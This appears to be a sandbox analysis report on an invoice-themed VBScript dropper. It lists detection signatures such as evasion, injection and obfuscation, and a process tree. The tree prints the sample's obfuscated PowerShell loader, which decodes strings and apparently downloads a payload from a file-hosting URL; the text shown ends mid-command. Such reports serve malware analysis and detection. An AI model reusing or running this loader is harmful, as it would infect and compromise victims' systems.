Edit tour
Windows
Analysis Report
FACTURA24021151 - BP.vbs
Overview
General Information
Detection
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 5580 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\FACTU RA24021151 - BP.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 5960 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Kummelnw eaving = 1 ;$Bredders 130='Subst rin';$Bred ders130+=' g';Functio n Fjter($O lericultur ally){$Kum melnterdiv isional=$O lericultur ally.Lengt h-$Kummeln weaving;Fo r($Kummel= 5; $Kummel -lt $Kumm elnterdivi sional; $K ummel+=(6) ){$Endocoe le67+=$Ole ricultural ly.$Bredde rs130.Invo ke($Kummel , $Kummeln weaving);} $Endocoele 67;}functi on Jardini ere($Overp articulari ty){. ($Lflaske rnes) ($Ov erparticul arity);}$H eltalsdivi sions=Fjte r 'BetimMS ourcoBa,ri zS,ouxiBou sol Ove.lD e sia M,du /Erh.e5Hre ls.Impla0 Bal, .ran( .rstaWpaaf uiSaltknIn tond nddoo Nonrew Udb osExplo Pr owlNPosteT Dig, ,mph 1Comor0 Be s . Xyl 0K nokk;Fugac Ga.seWdes eriEksplnT eko 6eksem 4 unap;Vil ,f ,iscoxI ndls6Skder 4,corz;no, ar P.pnsrE tiopv Uopd : Ch,f1Str ,g2 D.da1 Cre .Moron 0Aksel)Bay sv InkshGd ermee Cice cLa sekana ho Loin/ K,us2Zec i 0Mortr1Vig ep0 Para0D elta1 Misu 0Boble1Puc he Peri.FD evasiBogor rSk.dee Fl odf I,vioT urboxce.tr /Teuto1 He t2 Ra,e1V ulga.K.nne 0 P.ls ';$ Maskinkode rne=Fjter 'Kry pUSva r s kanteB u.ikrAn ev -,ardiABeh aggHemaneM olucnCereb trekyl ';$ Exencephal us=Fjter ' S.rihPour ptHaemut,m ugip Hepas Annu:quil l/Cikad/Bo nded Urobr edtsiFina gvSvovleHy per.,ugtsg Markojumb uoTryghgUd ledl To.ae .tat. Unn ocOm.aloPh legmDisjo/ codicuAase ncR,neb?Ku rsceBoothx Abdop .ea loDotyerBi ,iotQuadr= Jewed Bri moHydrowud planDornel SaucoSoli laBombadOm mbl&Turnui BalgedPoly p= Luf.1 r dso I osf BrnephPsyc p UnabnUh aanB BeneP AkutiLSttt euinterv S yn,CMo.orf E.cashChic oTTtskrdFa ntaXFaareG ibriSGle. sUTypeazu, vidn SideL ightMDevo vd SamdS S ammpForgaV Fri,iJ.dol i1Afret3Ki r.nulicit0 shir ';$t yphloempye ma=Fjter ' Udlev>.ert i ';$Lflas kernes=Fjt er 'Avlshi BortfeUn,r mx pio ';$ Nonpainter = Fjter ' Truele Tri ecGuldhhBu ccaoFo.si Begiv% Sha daBiddapRu m.opV,sitd enataChar mtNepe aOv ers% Udva\ MangmEna. eiMacuscUn sugrDal.oo Umisd Cor naBellicT lsttAfrivy Bop.elOver so TyrauAu tofsHalst. CalceA ing saNonprrCo evo Eppyd& Mi.da& S l v Materebu ndfcB ligh PikioAfte n Pitto$ J oy. ';Jard iniere (Fj ter 'Nippe $KnlesgSnu s.lFodb,o, fskebPr,sm aDet,mlAcc ro:N nexFA korjGippo e JuverApp e,dtilpleH ystedHab,r eFagall Dy resRikocnS laanokreol dPat,be.re derJivesn L goeIndfr =Fla,o(dia rhcOrdremB odsvdGrav Opgan/skam rcOsten De l $G.senNc arraobent nFlyflpFod svatelegiK r.dinCarro tEpicle As .erCoun,)F amil ');Ja rdiniere ( Fjter 'Dek la$Rvestgt als lC onk oBirkebPas siaOverult opar: Inte GFo.keawea .en Co,ogD esi.rBekla eRecollUnp ej=scolo$, arnfE Jets xKat aePec ,sn dkslcB .rnieHa ho p BranhFaa r.aStetilO leoduModre sMonod. Gr u.sMe,kipS engel Silk i FroctFol